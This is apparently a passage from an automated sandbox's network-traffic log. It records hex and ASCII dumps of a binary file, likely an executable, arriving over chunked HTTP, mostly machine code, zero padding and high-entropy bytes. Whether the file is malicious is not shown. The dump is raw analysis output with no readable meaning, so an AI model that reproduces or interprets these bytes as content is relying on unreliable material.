2023-07-27 18:18:58 UTC	76	IN	Data Raw: 32 30 30 30 0d 0a 0f 84 90 00 00 00 6a 08 e8 fd 01 00 00 8b 45 10 59 b9 00 0c 00 00 23 c1 74 54 3d 00 04 00 00 74 37 3d 00 08 00 00 74 1a 3b c1 75 62 d9 ee 8b 4d 0c dc 19 df e0 dd 05 98 c3 43 00 f6 c4 05 7b 4c eb 48 d9 ee 8b 4d 0c dc 19 df e0 f6 c4 05 7b 2c dd 05 98 c3 43 00 eb 32 d9 ee 8b 4d 0c dc 19 df e0 f6 c4 05 7a 1e dd 05 98 c3 43 00 eb 1e d9 ee 8b 4d 0c dc 19 df e0 f6 c4 05 7a 08 dd 05 88 c3 43 00 eb 08 dd 05 88 c3 43 00 d9 e0 dd 19 83 e6 fe e9 d6 00 00 00 a8 02 0f 84 ce 00 00 00 f6 45 10 10 0f 84 c4 00 00 00 33 f6 a8 10 74 02 8b f3 57 8b 7d 0c dd 07 d9 ee da e9 df e0 f6 c4 44 0f 8b 91 00 00 00 dd 07 8d 45 f8 50 51 51 dd 1c 24 e8 10 04 00 00 8b 4d f8 dd 5d ec 81 c1 00 fa ff ff 83 c4 0c 81 f9 ce fb ff ff 7d 0d dd 45 ec 8b f3 dc 0d 20 34 40 00 eb 53 Data Ascii: 2000jEY#tT=t7=t;ubMC{LHM{,C2MzCMzCCE3tW}DEPQQ$M]}E 4@S
2023-07-27 18:18:58 UTC	84	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:18:58 UTC	84	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	84	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:18:58 UTC	92	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:18:58 UTC	92	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	92	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:18:58 UTC	100	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:18:58 UTC	100	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	100	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:18:58 UTC	108	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:18:58 UTC	108	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	108	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:18:58 UTC	116	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:18:58 UTC	116	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	116	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:18:58 UTC	124	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:18:58 UTC	124	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	124	IN	Data Raw: 31 66 66 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 1ff8
2023-07-27 18:18:58 UTC	132	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:18:58 UTC	132	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:18:58 UTC	140	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	140	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:18:58 UTC	148	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:18:58 UTC	148	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	148	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:18:58 UTC	156	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:18:58 UTC	156	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	156	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:18:58 UTC	164	IN	Data Raw: 43 00 c4 cf 43 00 Data Ascii: CC
2023-07-27 18:18:58 UTC	164	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	164	IN	Data Raw: 32 30 30 30 0d 0a 7f 7f 7f 7f 7f 7f 7f 7f c4 97 42 00 c8 cf 43 00 c8 cf 43 00 c8 cf 43 00 c8 cf 43 00 c8 cf 43 00 c8 cf 43 00 c8 cf 43 00 c8 97 42 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000BCCCCCCCB
2023-07-27 18:18:58 UTC	172	IN	Data Raw: 00 55 db d8 a7 4a Data Ascii: UJ
2023-07-27 18:18:58 UTC	172	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	172	IN	Data Raw: 32 30 30 30 0d 0a 85 fc 6c 56 e7 aa 22 59 94 6a a1 ed 22 f5 d2 bc c1 fe 80 28 93 9e e7 5e 61 a2 0a 7d 0f 44 a1 8c 21 98 38 72 65 13 4b ae 5c dc 8b d4 25 7b 3d 5a 94 7d ac da e2 89 67 7e 4b 9a 5d d9 e5 e7 5b 5b e7 65 b5 69 96 24 ef 1d 98 2f e0 b0 89 2b c9 68 ad e6 91 b3 7f 55 4d 16 a4 0a 57 22 7b 00 3e c9 53 f5 72 24 c1 80 3a 90 44 9b 62 79 2c b3 68 12 eb 94 57 c1 c3 6c b3 a1 56 c2 1f d7 37 e5 a6 35 06 0a c3 ba fe bf 06 b4 0f 51 ec b0 7c 4d 16 e6 6c 6b 6e 22 a0 5e ef d6 47 b2 dc ef 8c e4 cf 40 06 b6 da 30 0a ea f5 2f 6b 5d 63 bb 2a c6 59 ce 53 14 c3 44 a0 54 25 f4 28 37 d4 bd fd 71 95 aa 13 78 dc 4c b8 b5 ed d6 3a 3c 5b 8d 17 78 24 bd 56 8f 64 d5 f2 40 21 16 d7 1a 4f fd 68 e9 cd 96 18 52 46 c9 4a a0 48 de a2 65 a0 d7 b7 6b f3 bc f7 7b 59 70 b4 0d de da bf Data Ascii: 2000lV"Yj"(^a}D!8reK\%{=Z}g~K][[ei$/+hUMW"{>Sr$:Dby,hWlV75Q\|Mlkn"^G@0/k]c*YSDT%(7qxL:<[x$Vd@!OhRFJHek{Yp
2023-07-27 18:18:58 UTC	180	IN	Data Raw: 1b 4c b8 7a 0d 8d Data Ascii: Lz
2023-07-27 18:18:58 UTC	180	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	180	IN	Data Raw: 32 30 30 30 0d 0a 69 0f c0 8c 66 6c 6f 30 f9 4a b8 a8 9d 4d cf 1e aa 01 9b c3 a9 18 67 fa 00 27 12 75 f5 ec 74 e5 d0 66 2e b4 65 dc 07 6f 3a 2b 72 9d 8f 58 8e 71 32 1f a1 1c 91 83 e6 93 f4 b9 16 2b 9a 7b 99 dd e9 28 6c 4f 58 e0 c9 5f d2 af 20 62 45 37 6b e6 8f 72 00 21 fd c0 a4 38 60 dc 59 25 89 3f 33 63 48 27 4e 75 45 48 d0 90 27 28 13 cf b3 26 5b f2 51 28 65 f7 b7 90 f8 67 33 3c 81 0c 48 bf 3f 0c b6 ba f5 e9 85 dc a9 e1 57 01 5a 29 c6 d8 f8 d1 08 73 78 5d cc 4c c1 e3 9d a6 a2 b0 52 36 8c af 82 af 16 79 35 0c c0 fe ed 5c b8 90 0f 7e 6c 26 e9 35 b7 ac 0e 47 15 45 27 38 9b 6c 43 a3 ef 6b 0d 97 0f 52 c5 80 74 ba 55 28 8d 6c 5e d5 d0 a3 fe 32 f2 1d b8 fc 9e 5b 91 be f5 0b 07 02 48 13 47 c3 2c 8d 28 ca bd 12 ad 49 20 79 12 e6 ea aa f6 fc ef c8 f8 ff c4 82 f6 Data Ascii: 2000iflo0JMg'utf.eo:+rXq2+{(lOX_ bE7kr!8`Y%?3cH'NuEH'(&[Q(eg3<H?WZ)sx]LR6y5\~l&5GE'8lCkRtU(l^2[HG,(I y
2023-07-27 18:18:58 UTC	188	IN	Data Raw: 2e c6 7c 56 c4 7b Data Ascii: .\|V{
2023-07-27 18:18:58 UTC	188	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	188	IN	Data Raw: 31 66 66 38 0d 0a b2 9d c4 8e 90 31 17 63 53 ad 06 da af b5 f5 3d 41 87 e8 c7 10 09 90 6f d5 c2 ad e8 0e 00 f6 e6 92 0e 8c 36 a5 99 60 45 f0 8c 4e a5 eb 82 d6 1e 82 92 d2 7d 32 c4 7f fb 65 b2 8d 2c 44 1e 72 1b f8 e1 79 e1 6e 9d 3e 24 b1 8d b0 5d dd 4f f7 ef 2f 8a fa 0a 65 58 bb 97 f6 52 a7 35 09 26 34 a1 7d 32 6f 0a 83 02 3d 34 07 0c 0c 15 d9 85 f8 54 c2 70 bb ad 64 7d 64 08 a4 e0 a6 76 01 be 96 9d 82 0f 8c e3 c7 5d 32 d6 66 8f 0a 81 35 0f 81 ad 5f fc b5 75 69 38 39 66 7f bb 56 63 2c 51 0c 60 18 ea 0d 2c ed 44 66 f1 58 43 72 94 75 93 ad 20 ec 67 2f 36 c0 a6 9b 60 44 fb 2c 33 3f 96 57 cb 4f 22 9e c5 b0 13 a4 12 41 3a 2b 9f 2b 9b 8a f2 56 d7 bd 45 17 37 73 11 f8 73 0a 93 9d 45 2e 70 66 43 a3 3d 12 6e 6e ee a9 4f d2 70 9f 94 9b d2 6a 12 fb 8c aa 64 fd 62 c0 Data Ascii: 1ff81cS=Ao6`EN}2e,Dryn>$]O/eXR5&4}2o=4Tpd}dv]2f5_ui89fVc,Q`,DfXCru g/6`D,3?WO"A:++VE7ssE.pfC=nnOpjdb
2023-07-27 18:18:58 UTC	196	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:18:58 UTC	196	IN	Data Raw: c4 16 45 89 7f 56 fc 1c e8 3b 27 a9 51 80 9a 8a c4 b3 e8 a6 ce b7 9c ec 4d 4c df a5 5a 31 2f ca 90 2c ee aa 12 fb 4e 7a 0e b8 54 a3 52 49 09 e8 23 05 f7 7c 5c a4 03 d8 8e ff 04 6d 20 90 b3 c8 17 12 8d dd d3 98 49 05 52 40 b7 12 0e 2a 95 4b 4f 7d 25 b5 f8 f3 20 66 2c 22 7d 22 8d 72 1b 11 d4 94 cf c4 c3 62 bd 2d 37 04 0a 41 27 74 8e a8 8c f8 a3 f1 ec e4 a1 bd be bf d6 a2 95 e6 b6 d4 07 6b 97 41 8a 3b 34 58 a0 a0 a5 c3 c4 e9 25 79 d7 b1 97 47 3c 80 cb 53 41 3a 85 f5 38 46 bc 1d f7 5a 47 8b ae ba df 5b 90 a4 7e 26 35 ef fa f3 a6 0a c1 6b 04 a8 1a 22 5a b7 76 9e 8c ef 16 3e 7b 18 d8 d9 d1 c8 31 db 88 ca a5 27 2b d1 21 c9 a9 cd 0f 9a 2f 3c 98 8d 60 2c d2 0b d0 b5 c8 a2 b7 e7 49 3a b9 64 3a a1 20 db cb f7 d4 c2 2c c2 30 f3 a9 db 5d 64 00 1f 58 a8 f9 50 b6 fa 32 Data Ascii: EV;'QMLZ1/,NzTRI#\|\m IR@*KO}% f,"}"rb-7A'tkA;4X%yG<SA:8FZG[~&5k"Zv>{1'+!/<`,I:d: ,0]dXP2
2023-07-27 18:18:58 UTC	204	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	204	IN	Data Raw: 32 30 30 30 0d 0a 24 7a ef 34 18 19 02 49 da 87 30 6f f8 8b b9 e3 cb 4a f4 c7 b4 e3 89 26 2f 78 a0 0b c3 cd 6c 02 6e 56 1b 0f 1a 5b 4f 60 8e d6 2b 0e 3b 76 93 af 96 2c 77 8a 12 56 55 a8 66 1e 74 e1 1c 8e 89 1a eb 4f ae 69 e6 80 12 92 7d 5b 87 bd 36 32 da 8f aa 46 3f 01 d8 29 cf 83 38 7e 57 b6 af a1 fc 8d 7e 1a 83 a4 92 4b 6a 7e 08 b7 bd 20 03 9c 15 39 25 a9 15 0c 5a b1 ab c0 68 ea a0 22 65 9a 04 e0 b3 4b 8b 30 7c e7 e9 c3 82 ed a0 32 9b 29 c7 4f 2e 05 97 89 42 cf 9b 4c 61 2e 22 26 25 d2 c8 70 03 d4 2b a9 16 72 e5 57 27 d4 3a 1a 46 86 3b fa dd 48 5f 44 aa 5a 6e f7 c0 3b 2c 55 aa f3 70 de e4 8b bf 1c 1c b1 d6 eb 1b b7 9d 11 8a ef c8 b8 24 27 a6 e0 89 f3 82 ca 2a ca 80 58 18 3e 28 ea bf 46 74 4c 6c f6 2a 33 0d 13 1c 60 19 d8 dd d7 e0 a7 85 20 1a 59 69 e8 6e Data Ascii: 2000$z4I0oJ&/xlnV[O`+;v,wVUftOi}[62F?)8~W~Kj~ 9%Zh"eK0\|2)O.BLa."&%p+rW':F;H_DZn;,Up$'X>(FtLl3` Yin
2023-07-27 18:18:58 UTC	212	IN	Data Raw: f4 18 4e 9e d6 e5 Data Ascii: N
2023-07-27 18:18:58 UTC	212	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	212	IN	Data Raw: 32 30 30 30 0d 0a c4 b6 b3 22 3a c3 ab 35 18 80 b9 00 ce a7 9f 79 80 70 3a f9 af ac 49 b3 c4 90 21 93 14 a1 10 67 6c 4d 7a f3 e5 b4 af d2 69 0b 21 4e cf 6d 83 79 94 91 0f 2a 4d 7f 42 62 27 b2 b4 f7 21 dc ef b3 01 5d 4e 75 8b 23 aa 82 a5 ae 23 bf c0 aa ee 1a ea f1 3c c4 34 8f 0e 78 25 c4 84 12 89 3b 90 ab 20 38 9d 83 d5 07 5d 69 c3 ff a0 be 3d 4c 0a d3 c0 26 ce fd bb 8b 84 ba 47 e0 6f 05 4d d0 ae 74 69 7a 65 a6 a8 47 6e c1 b6 f1 64 22 61 c6 64 e4 b5 e3 8b 8e d9 1f 74 73 d1 6a ed 8e a8 0a 15 6e ed 96 bd 41 e4 c9 65 90 2c ac c6 b9 16 39 c6 32 e1 72 9b 87 79 b7 94 24 2e 9d 83 8a 1b 24 5e 99 35 01 96 de e8 55 18 45 1e b5 cb 52 33 ff aa 04 46 a3 16 54 b2 bd 3a fd f8 4f e6 1f 6e 90 82 d4 31 74 4b e2 9e 15 9a ee d7 a5 96 a2 04 3c a8 a1 0a 3f 62 e8 dc 7d 8b 43 e7 Data Ascii: 2000":5yp:I!glMzi!Nmy*MBb'!]Nu##<4x%; 8]i=L&GoMtizeGnd"adtsjnAe,92ry$.$^5UER3FT:On1tK<?b}C
2023-07-27 18:18:58 UTC	220	IN	Data Raw: 8d 29 7f 10 5e 8c Data Ascii: )^
2023-07-27 18:18:58 UTC	220	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	220	IN	Data Raw: 32 30 30 30 0d 0a 77 56 e9 20 1c ba 85 5d 33 7c 4b 9e 1d 79 a6 b7 82 63 df 06 f6 3b 2f 83 06 b6 42 36 3e af 08 4d 21 b3 51 62 86 0d 5e 32 90 e6 3c 41 12 15 1d ea d2 6f d6 05 4b e6 34 93 33 7e 52 eb d8 cd 95 d4 50 19 c3 8d 75 c3 60 0a a1 1f 3d 47 38 bb dc 0a 34 2a 42 ff 36 d0 65 e3 a2 be 25 37 4e e0 2f 17 2d 82 28 5b 92 01 22 8a a9 b1 24 df 8f ca a8 43 11 31 a2 82 24 3a 8a 94 db ea 7c 3b a9 ad fe cc fe 76 bf d9 19 57 99 37 37 c1 eb c5 9c 25 e3 5f e7 72 9b 42 e8 09 d4 be cd 07 ee 32 a1 ac fe ac ac c3 4e 22 9a 73 e3 36 02 51 4c b6 66 1a 66 4e 97 4f e7 80 68 c2 27 5e 54 a3 f9 b0 a3 a1 e6 91 68 e3 f3 38 22 8e 6b 79 32 79 c3 04 10 bb d9 95 15 b8 66 c5 aa db 3c 7d bc 30 c9 a9 15 7b b2 a0 b6 7c 72 57 5d 98 fb d9 2d 2b e9 f5 d8 f0 39 b3 64 08 d1 4a 76 80 af 6b 2a Data Ascii: 2000wV ]3\|Kyc;/B6>M!Qb^2<AoK43~RPu`=G84B6e%7N/-(["$C1$:\|;vW77%_rB2N"s6QLffNOh'^Th8"ky2yf<}0{\|rW]-+9dJvk
2023-07-27 18:18:58 UTC	228	IN	Data Raw: 2c 25 9d dc 2b 19 Data Ascii: ,%+
2023-07-27 18:18:58 UTC	228	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:18:58 UTC	228	IN	Data Raw: 32 30 30 30 0d 0a 5b c7 9f 33 f7 cc bd fe 4f b4 08 d5 b9 aa 49 96 f2 08 e8 c3 c7 58 54 04 7a c3 9c d9 76 63 ce 0b 41 f0 fc 0c 2b fa 6e ff bd 98 9d 18 99 e4 d0 8b dd eb 4a 10 e1 30 e7 a9 df 6c c2 99 27 00 ff 6a 4a e3 8a f7 42 14 d6 de 21 83 41 49 22 d8 3a 08 af b2 d9 5e 15 74 30 52 76 82 82 96 a4 78 b7 b7 34 87 15 ea 55 66 4c 88 4f b3 8b 1e 1c 2e f0 f5 09 43 f5 46 cf 93 0c 98 80 ec 80 98 96 6a a7 0f 95 c3 8b 9b 9a 9f 2f 29 8e a3 c8 d6 4e 64 13 ee 21 7b 65 7f ba f3 36 69 e6 9c 1b b2 3d ea 65 6c bd ce da ba b2 15 32 b1 23 65 7b e3 3c 8f e1 35 2e 8a f7 cb e3 de 02 31 91 05 c6 fa 8b 4e 09 07 6a 9a b6 25 02 8d de 18 3f af e5 be 55 c7 7c 37 28 bc 82 82 61 5e 84 b0 0f 5e 08 01 a4 e6 fb 82 92 e8 57 b0 fe 8a 92 a6 bb 1a 50 36 d0 a7 b4 de 16 e9 83 0c e3 06 95 2f 49 Data Ascii: 2000[3OIXTzvcA+nJ0l'jJB!AI":^t0Rvx4UfLO.CFj/)Nd!{e6i=el2#e{<5.1Nj%?U\|7(a^^WP6/I
2023-07-27 18:18:58 UTC	236	IN	Data Raw: d6 9a 3e e3 1a f0 Data Ascii: >
2023-07-27 18:18:58 UTC	236	IN	Data Raw: 0d 0a Data Ascii:
